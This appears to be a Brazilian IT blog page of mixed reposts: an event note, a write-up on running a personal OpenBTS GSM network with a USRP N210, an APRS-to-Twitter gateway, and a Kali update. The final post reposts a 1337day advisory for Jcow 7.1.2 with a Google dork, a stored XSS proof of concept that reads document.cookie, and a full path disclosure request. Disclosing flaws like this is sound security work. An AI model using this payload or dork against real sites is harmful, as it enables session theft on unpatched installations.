Projeto TI
Headlines News :

.

Latest Post

Vem Aí , #cpbr7!

Written By x86_g on 2013-10-26 | 8:36 AM


Evento super power Geek chegando mais uma vez pra agitar nossas cabeças!
To ligadão até Janeiro muito café vai rolar até o Grande Dia!!!

Paguei 160,5 no total sem a barraca, consegui com um colega uma barraca irei pagar 35 Reais a mais!
Vamo que vamo!!!!

A day with my personal GSM network

Written By x86_g on 2013-10-22 | 4:46 PM

Couple of months ago I bought an USRP N210 from Ettus research (www.ettus.com) and since then I did not have time to test what it can do until today. I have big plans with this SDR and another one I also own – QS1R but today I will tell only about this fine hardware which is USRP N210.

The above picture shows USRP N210 with RFX900 board, Basic RX and Basic TX boards. Inside is already mounted the WBX board. Here are the frequencyes:
WBX – 50Mhz to 2.2Ghz, one Rx, one Tx – 100mW output
RFX900 – 800Mhz to 1Ghz, one Rx, one TX – 200+mW output
Basic RX, Basic TX – made to be interfaced with external RF hardware
What I am going to use USRP N210 for?
I am interested in the use of SDR for Tetra decoding, GSM decoding, Radar, what else? The ADC and DAC of the boards have 100Msps which gives pretty good spectrum bandwidth. It’s amazing how many people use this SDR and how many applications are out there on the web so I decided to test couple of them before starting to change the FPGA and firmware. The good news are that Matlab can work direct with USRP N210. This is really great news.
The board works great in conjunction with GNUradio (www.gnuradio.org) open source software and uses the new UHD (Universal Hardware Driver). Some of the applications one could find on the web are written for non-UHD USRP and do need converting to UHD.
I decided to see what I can run in a day of weekend so here it is: OpenBTS – an open source GSM software. And a WFM receiver as a plus. I won’t go into details on what I did to configure various bits since everything worked out of the box without too much tweaking. Though, I’ll point out only where documentation is available on the web so that you’ll have the starting point.
1. Need 1Gbps network card in your PC. The USRP N210 comes with address 192.168.10.2. Then configured the PC eth to have IP 192.168.10.1, netmask 255.255.255.0
2. Installing UHD driver from git: http://code.ettus.com/redmine/ettus/projects/uhd/wiki
Test if USRP N210 is found with find_uhd_devices. It won’t show the serial number unless you install latest firmware.
3. Installed the latest FW and FPGA images with usrp_n2xx_net_burner.py
test the connection with uhd_find_devices and uhd_usrp_probe
4. Installed gnuradio: www.gnuradio.org
You need to satisfy all dependencies in order to be able to run GRC examples.
6. Installed Asterisk (I’m using Ubuntu 10.04) and added all Asterisk configs from OpenBTS to /etc/asterisk/
7. Run Asterisk, OpenBTS, smqueue. Searching manually for GSM network I discovered a new network ( I used ARFCN 51 on GSM900 band). Connected to the network.
8. Found my phones IMSI: sent a SMS message to 411 and got the replay with phone’s IMSI.
9. Add a phone number to the related IMSI in the sip.conf and add a SIP rule in the extensions.conf
10. Now when I send an empty SMS to 411 I get also the phone number together with IMSI.
11. To verify that phone is connected to the network send a SMS to 101 with the phone number in the body. You’ll get a replay saying the phone is registered.
12. Now I’m able to do phone calls and SMSs between the two phones I have with the arbitrarily chosen numbers 2101 and 2102.
13. To be able to see various GSM messages on the Um interface I installed latest version of wireshark which knows gsmtap and is able to show what USRP board transmits and receives.
OpenBTS is a nice tool to play with even though it is not production ready. It helps me a lot in learning how GSM is working.
One tool used together with USRP N210 was Kalibrate which not only helps in calibrating the USRP clocks by using the neighbor networks but also scans the local environment and prints what it finds:
kal -s 900
GSM-900:
chan: 18 (938.6MHZ + 14.186kHz) power 18032.11
chan: 22(939.4Mhz + 14.288kHz) power 3554.23
FM radio test
Gnuradio comes with a graphical IDE called GRC (Gnuradio Companion) that will speed-up the process of creating various SDR projects. I found out OZ9AEC page (http://www.oz9aec.net/index.php/gnu-radio/grc-examples) where couple of working GRC examples are presented. They are also converted to UHD so it is just a matter of running GRC to see what’s all about. One comment about the GRC: when building gnuradio one needs to bring in all the dependencies so that all Vx and Qt widgets will be in the release.  Here are the screen shots with a FM receiver implemented in GRC:
As a conclusion, I like this new USRP N210 and as I said I’m planning to write a lot of code for it to implement my ideas. One thing on the down side is that in order to build the FPGA image one needs a tool from Altera that is not free and if you add this to the price of the board … On the good size I would love the openess of gnuradio, the integration with Matlab and the options that Ettus offers through their large list of daughter cards.

Sending APRS message to Twitter

Just in a discussion with a fellow motorcyclist, I found out that people wants to send Twitter messages (to tweet – a new verb :) ) from various kind of devices like PDA-s, phones, radios. Knowing that APRS could be used to send short messages that are even shorter than Twitter ones made me think why shouldn’t I make an application to allow ham radio enthusiasts  sending APRS messages to its own Twitter account? This seemed to be an easy task, just couple of days of work. For the impatients here is the link to what you need:
I’ve seen two sub tasks to accomplish the main task of sending the message from Twitter to APRS: Authentication and Message passing between the two networks.
There are some differences between Twitter and APRS when talking about authentication. APRS has no authentication, Twitter has a good authentication as of 2010, OAuth.
The message passing is easily accomplished once the authentication is done, the application needs just to listen to a connection to one of the main APRS-IS servers and when receiving a message, will send it to Twitter server.
How it works:
Authentication is done on a perl CGI that receives user’s callsign and then proceed to authentication with Twitter. You’ll be asked to accept access from APRS to Tweet application. Once the authentication is finished, the user callsign and its Twitter OAuth tokens are stored in a local database. Remember that OAuth does not know at any time your Twitter user and password, therefore no such info is stored on the server.
Sending the message to Twitter is simple: you send the message from APRS to callsign YO3IIU-11 and it is mandatory that the message have “tweet:” included at the beginning of the message. Otherwise the message will be rejected. It is designed like this just to filter broadcast messages that will come to YO3IIU-11.
That’s all folks,
73, YO3IIU


Kali 1.0.5 lançado

Written By x86_g on 2013-09-05 | 12:53 PM

O dia está cheio de novidades no blog e este é o terceiro post. Vamos lá.
Saiu o Kali 1.0.5 trazendo uma série de novidades e correções. Não me aprofundarei explicando que o Kali é uma distribuição Linux focada em segurança e que veio substituir o BackTrack.
As atualizações e correções desta nova release poderão ser consultadas a partir do seguintelink, e caso vc utilize-o, mas na versão mais antiga, basta executar os comandos abaixo para atualizá-lo:
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade
Utilizem-o com moderação — :)

Fonte: Coruja de Ti.

Jcow 7.1.2 XSS/FPD Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                  I'm DaOne member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
---------------------------------------------------
# Exploit Title: Jcow 7.1.2 XSS/FPD Vulnerabilities
# Author: DaOne aka MockingBird
# Vendor Homepage: http://www.jcow.net/
# Category: webapps/php
# Version: 7.1.2
# Google dork: "Powered by Jcow 7.1.2"
---------------------------------------------------
 
[#] [XSS]
the application does not validate the 'tags' parameter {/index.php?p=streampublish}
script code would execute in {/index.php?p=videos/viewstory/*id*}
 
-PoC-
POST /jcow.7.1.2.ce/index.php?p=streampublish HTTP/1.1
 
page_id=1&oncomment=0&page_type=u&message=Share+with+your+followers...&video_title=DaOne&description=tst&tags="><ScRiPT>alert(document.cookie)</ScRiPT>&youtube_url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DErCAOMi5EGM&youtubeid=&attachment=videos
 
 
 
[#] [Full Path Disclosure]
POST /jcow.7.1.2.ce/index.php?p=member/loginpost HTTP/1.1
 
username[]=tst&password=tst
 
 
                                        /jcow.7.1.2.ce/includes/libs/apps.inc.php
                                        /jcow.7.1.2.ce/includes/libs/u.module.php
                                        /jcow.7.1.2.ce/modules/admin/admin.php
                                        /jcow.7.1.2.ce/modules/apps/apps.php
                                        /jcow.7.1.2.ce/themes/default/home.tpl.php
 
# FE3F5F237889B11D   1337day.com [2013-09-05]   C2E397F31D91D749 #